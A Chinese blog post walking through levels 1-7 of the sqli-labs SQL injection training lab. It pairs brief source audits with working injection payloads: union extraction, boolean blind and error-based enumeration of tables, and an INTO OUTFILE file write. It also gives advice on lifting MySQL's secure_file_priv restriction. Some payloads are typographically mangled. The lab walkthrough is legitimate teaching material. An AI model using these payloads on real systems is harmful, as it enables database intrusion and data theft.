sqli-labs-master-源码审计(less-1-7)

已于 2022-04-04 15:05:04 修改
阅读量4.2k 收藏 2
点赞数
分类专栏: 笔记 网络安全 文章标签: mysql 网安
于 2022-04-04 15:00:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47053270/article/details/123953905
版权

less-1
先看源码,查看重点代码,sql传参没有进过任何过滤
请添加图片描述

请添加图片描述

使用语句:
单引号判断:http://127.0.0.1/sqli-labs-master/Less-1/?id=1’
判断字段:http://127.0.0.1/sqli-labs-master/Less-1/?id=1’order by 4 --+
判断注入位置:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,2,3 --+
获取信息:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’ union select 1,2,(concat_ws(char(32,58,32),user(),database(),version())) --+

less-2
审计源码
发现$id并没有进行单引号,id也没有进行过滤,构造语句:-1unionselect1,database(),user()
请添加图片描述

less-3
审计源代码
发现id也没有进行过滤,$id加()了,尝试使用单括号闭合,构造语句:-1’)union select 1,database(),user()–+
请添加图片描述

less-4
审计源码可以看到,对id进行加双引号过滤,尝试构造:http://127.0.0.1/sqli-labs/Less-4/?id=1") order by 3 --+
请添加图片描述

less-5
盲注:布尔盲注,时间盲注,还有报错注入
可以采用burp、sqlmap进行注入
burp:
判断数据库长度-设置后面的1为变量:1’ and length(database())=1–+
猜测数据库名–1,1为第一位,2,1为第二位–从a开始GET /Less-5/?id=1’ and substr(database(),1,1)=‘§a§’–+
爆破表的数量:1’ and (select count(table_name) from information_schema.tables where table_schema = ‘security’) =4–+
爆破表的名称:1’ and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1) = ‘e’–+
#其中limit0,1是获取第一个表,1,1就是第二个表,2,1是第三个表,3,1是第四个表。
#1,1是第一个表中的第一个字符,2,1就是第二个字符,依次类推。

请添加图片描述

less-6
和第五关类似,只不过你把单引号换成双引号,示例:http://127.0.0.1/sqli-labs/Less-6/?id=1" and (select1from (selectcount(*),concat(0x3a,0x3a,(select table_name from information_schema.tableswhere table_schema=database() limit0,1),0x3a,0x3a,floor(rand()*2))namefrom information_schema.tablesgroupbyname)a)–+
请添加图片描述

less-7
考点在于mysql最高权限
构造语句:http://127.0.0.1/sqlilabs/Less-7/?id=1’))%20union%20select%201,2,3%20into%20outfile%20%22c://phpStudy//PHPTutorial//www//sqlilabs//Less-7//uuu.txt%22%23
查看目录下,已生成uuu.txt文档

注意在要对文件进行导入导出首先得要有足够的权限,
但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null)
secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
1、当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出。
2、当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下。
3、当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
用以下命令查看secure_file_priv的值

请添加图片描述


在my.ini文件[mysqld]的后面加上secure_file_priv=‘’(两个英文单引号),然后重启phpstudy即可。
源码如下:
请添加图片描述

忘_忧
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
SQL注入靶场sqli-labs(1-6)
m0_49025459的博客
05-09 763
Less-1(基于错误的GET单引号字符型注入) 我们直接看看源码弄明白什么是单引号字符型注入 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id']))//判断GET获取的id不能为空 { $id=$_GET['id'];//让id=我
Sqli-labs 查看源代码 1-20
foolisheddy
03-08 4398
Less-1 indexphp sqli-connectphp db-credsinc GET - 基于错误 - 单引号 - 字符型 Less-2 GET - 基于错误 - 整型 Less-3 基于错误 - 单引号变形 - 字符型 Less-4 基于错误 -双引号- 字符型 Less-5 Less-6 双注入-双引号-字符型 Less-7 单引号 双括号 非基于错误 Less-8 基于布尔 - 单引
Sqli-labs 查看源代码 21-30
foolisheddy
03-08 999
Less-21 POST - cookie注入 - base46 编码 Less-22 POST - cookie注入 - base46 编码 Less-23 GET - 注释符绕过 Less-24 post - 二次注入 Less-25 GET - 绕过or 和 and - 字符型 Less-26 GET - 过滤空格 - 字符型 Less-27 GET - 过滤UNION和SELECT - 字符
如何查看源代码及一些代码的解释
qq_62495757的博客
07-11 5234
如何查看源代码及一些代码的解释
sqli-labs通关(less1~less10)
热门推荐
箭雨镜屋
08-16 1万+
这10关都是GET型的,包括了union注入、报错注入、布尔盲注和时间盲注,虽然包含了几种闭合方式,但是没有涉及到过滤和绕过,是最基础的关卡。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
phpstudy+靶场sqli-labs-master下载
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs-book
03-26
sqli-labs-book
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
源代码sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
SQLi-Lab:每个SQL注入实验室
03-29
每个SQL注入的实验室
sqli-lab通关txt
07-22
sqli-lab1~10的通关txt,其中包含了注入代码以及相关注解 代码由于存储在txt中,无法直接复制使用,请手打。 (可能是由于编码问题)
Windows搭建sqli-labs靶场
JJH2724719395的博客
11-19 738
Windows搭建sqli-labs靶场
SQL Injections及sqli-labs练习
weixin_54347738的博客
09-01 188
从数组中取值取出它的key,将值放入前端并写了html样式,若没取到,mysql会将报错打印,若最上面未使用get传参id,则会让你输入数字类型的id。①使用get传参,语句中传入的id,其实是users表中的id,id字段其实就类似于身份证编号是唯一可以区分用户的,如下图所示:使用id作为限制条件查出某个人:②将下图中的注释打开,即可得到我们查询到的数组的数据由上图可知,数组是以key取值的。
sqli-labs靶场搭建(Windows环境)
你还心动吗
02-01 1203
sqli-labs是一个印度程序员写的一个关于SQL注入的靶场,一共有65个关卡,其中关卡的类型有但不限于联合查询注入,报错注入,布尔盲注,延时盲注,POST注入,Cookie注入,WAF绕过。
sqli-labs 靶场搭建
weixin_56306210的博客
07-26 1120
sqli-labs 靶场搭建
sql-labs通关教程
m0_62274649的博客
10-30 814
sqllabs搭建
sqli-labs-master
07-22
1. 下载sqli-labs-master压缩包并解压缩。 2. 安装LAMP或WAMP环境,确保Apache、MySQL和PHP已经安装并配置好。 3. 将解压缩后的sqli-labs-master文件夹复制到Apache或WAMP的web目录下。 4. 在MySQL中创建一个名为...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

忘_忧

留个打赏呗

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值